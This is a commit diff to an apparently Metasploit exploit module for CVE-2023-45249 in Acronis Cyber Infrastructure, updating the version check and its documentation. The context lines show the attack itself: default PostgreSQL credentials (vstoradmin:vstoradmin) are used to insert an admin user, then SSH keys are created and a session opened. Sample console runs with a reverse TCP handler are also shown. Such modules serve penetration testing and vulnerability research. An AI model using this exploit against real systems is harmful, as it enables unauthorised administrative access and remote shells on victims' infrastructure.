third release addressing majority of the review comments

h00die-gr3y · h00die-gr3y · commit 9971aed96f42 · 2024-09-17T19:23:38.000Z
diff --git a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -137,12 +137,12 @@ View the full module info with the info -d command
 msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5
 rhosts => 192.168.201.5
 msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > check
-[*] 192.168.201.5:8888 - The target appears to be vulnerable. Version 4.7.1.pre.53
+[*] 192.168.201.5:8888 - The target appears to be vulnerable. Version 4.7.1-53
 msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
 
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version 4.7.1.pre.53
+[+] The target appears to be vulnerable. Version 4.7.1-53
 [*] Creating admin user qagkx with password gXv0E2DUU9 for access at the Acronis Admin Portal.
 [*] Saving admin credentials at the msf database.
 [*] Creating SSH private and public key.
@@ -168,7 +168,7 @@ target => 1
 msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version 4.7.1.pre.53
+[+] The target appears to be vulnerable. Version 4.7.1-53
 [*] Creating admin user exvk1 with password NcwVNFNL3t for access at the Acronis Admin Portal.
 [*] Saving admin credentials at the msf database.
 [*] Creating SSH private and public key.
diff --git a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -121,9 +121,8 @@ def run_query(query)
     end
   end
 
-    # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
+  # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
   def add_admin_user(username, userid, password)
-
     vprint_status("Creating admin user #{username} with userid #{userid}")
 
     # add new admin user to the user table
@@ -159,10 +158,10 @@ def add_admin_user(username, userid, password)
     true
   end
 
+  # create SSH session.
+  # based on the ssh_opts can this be key or password based.
+  # if login is successfull, return true else return false. All other errors will trigger an immediate fail
   def do_sshlogin(ip, user, ssh_opts)
-    # create SSH session.
-    # based on the ssh_opts can this be key or password based.
-    # if login is successfull, return true else return false. All other errors will trigger an immediate fail
     begin
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         self.ssh_socket = Net::SSH.start(ip, user, ssh_opts)
@@ -235,7 +234,7 @@ def execute_command(cmd, _opts = {})
     @timeout = true
   end
 
-  # Return ACI version-release or nil if not found
+  # Return ACI version-release string or nil if not found
   def get_aci_version
     res = send_request_cgi({
       'method' => 'GET',
@@ -259,19 +258,27 @@ def get_aci_version
     release = res_json['storage-release']['release']
     return if release.nil?
 
-    Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, ''))
+    "#{version}-#{release}".gsub(/[[:space:]]/, '')
   end
 
   def check
     version_release = get_aci_version
     return CheckCode::Unknown('Could not retrieve the version information.') if version_release.nil?
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.0.1-61')
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.1.1-71')
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.2.1-69')
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.3.1-53')
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.4.4-132')
-
-    CheckCode::Appears("Version #{version_release}")
+    return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')
+
+    case version_release.split(/\.\d-/)[0]
+    when '5.0'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')
+    when '5.1'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.1.1-71')
+    when '5.2'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.2.1-69')
+    when '5.3'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.3.1-53')
+    when '5.4'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.4.4-132')
+    end
+    CheckCode::Safe("Version #{version_release}")
   end
 
   def exploit
